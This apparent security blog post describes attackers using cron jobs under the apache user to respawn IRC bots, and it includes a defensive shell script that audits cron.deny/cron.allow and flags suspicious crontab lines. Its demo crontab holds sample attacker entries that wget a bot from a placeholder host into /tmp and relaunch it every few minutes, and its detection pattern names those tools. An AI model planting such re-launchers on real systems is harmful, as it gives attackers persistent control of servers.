Got some hacker program that keeps relaunching itself? Cannot find the source? Well, you may want to check cron. Recently, we’ve seen several attacks where hackers have set up cron jobs to relaunch their toolkits.
Over the past month, we’ve investigated about a half dozen incidents where a hacker-related process, typically an IRC bot, was running on a server. If we killed the process, it would re-spawn within minutes.
In some cases, we had already removed the PHP scripts that led to the initial exploit, so seeing the process relaunch was suspicious. They had to be relaunching the process somehow. Even with Apache offline, the process would re-launch. This made me suspect a cron job or a similar trick.
In several cases, we’ve found cron jobs set up under the apache user. The attackers had used a PHP shell kit to set up a cron job under the apache user. As a result, they could continually re-launch their IRC bots any time the server admin killed them off.
After patching up the system, we wanted to prevent this trick from being used in the future. This is where cron access control comes in handy.
On Red Hat systems, you can limit who uses cron with the /etc/cron.allow and /etc/cron.deny files. By adding the apache user to /etc/cron.deny, you can block hackers from setting up a cron job as apache.
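Here is a small shell script, added as an example and not part of the original post, that does the two checks a responder wants after this kind of incident: whether the apache user is actually blocked from crontab under the cron.allow/cron.deny rules, and whether the apache spool file contains entries that look like a re-launcher (commands living in /tmp, /var/tmp or /dev/shm, or fetching something at run time). It assumes the Red Hat/cronie layout (per-user crontabs in /var/spool/cron/&lt;user&gt;, access lists in /etc/cron.allow and /etc/cron.deny); the function names, the sample crontab and the PLACEHOLDER host are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post. Audits cron access control for a
# service account (here "apache") after an incident like the one described above.
# Assumes the Red Hat/cronie layout: per-user crontabs in /var/spool/cron/<user>,
# access lists in /etc/cron.allow and /etc/cron.deny. All paths are parameters
# so the functions run against constructed sample files as well as a live system.

# cron_access USER DENY_FILE ALLOW_FILE
# Prints "denied" or "allowed". Precedence follows crontab(1): when ALLOW_FILE
# exists, only the users listed in it may use crontab; otherwise users listed in
# DENY_FILE may not. If neither file exists the result depends on the site
# configuration, so "unknown" is printed rather than a guess.
cron_access() {
    user=$1 deny=$2 allow=$3
    if [ -f "$allow" ]; then
        if grep -qx "$user" "$allow"; then echo allowed; else echo denied; fi
    elif [ -f "$deny" ]; then
        if grep -qx "$user" "$deny"; then echo denied; else echo allowed; fi
    else
        echo unknown
    fi
}

# suspicious_cron_lines SPOOL_FILE
# Prints crontab lines (comments skipped) whose command runs out of a scratch or
# world-writable directory, or downloads something at run time. These are the
# patterns behind "kill it and it is back in minutes": the job just restarts
# the bot from a dropped file. Zero matches is a normal result, hence "|| true".
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' "$1" \
        | grep -E '(/tmp/|/var/tmp/|/dev/shm/|wget |curl )' || true
}

# --- demo against constructed sample files (no system files are touched) ---
demo=$(mktemp -d)
printf 'apache\nnobody\n' > "$demo/cron.deny"     # constructed /etc/cron.deny
cat > "$demo/apache" <<'EOF'
# constructed /var/spool/cron/apache: one legitimate admin job, two re-launchers
0 3 * * * /usr/local/bin/rotate-logs.sh
*/5 * * * * /tmp/.x/bot >/dev/null 2>&1
*/10 * * * * wget -q -O /tmp/.x/bot http://PLACEHOLDER.example/bot
EOF

echo "apache cron access: $(cron_access apache "$demo/cron.deny" "$demo/cron.allow")"
echo "suspicious entries in the apache crontab:"
suspicious_cron_lines "$demo/apache"
rm -rf "$demo"
```

On a real Red Hat box the same functions are called with the live paths: `cron_access apache /etc/cron.deny /etc/cron.allow` and `suspicious_cron_lines /var/spool/cron/apache`. Note that cron.deny only stops the apache user from installing new jobs; a crontab the attacker already planted in the spool still has to be removed by hand (`crontab -r -u apache` as root).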
For more details on cron access control, see the Red Hat documentation.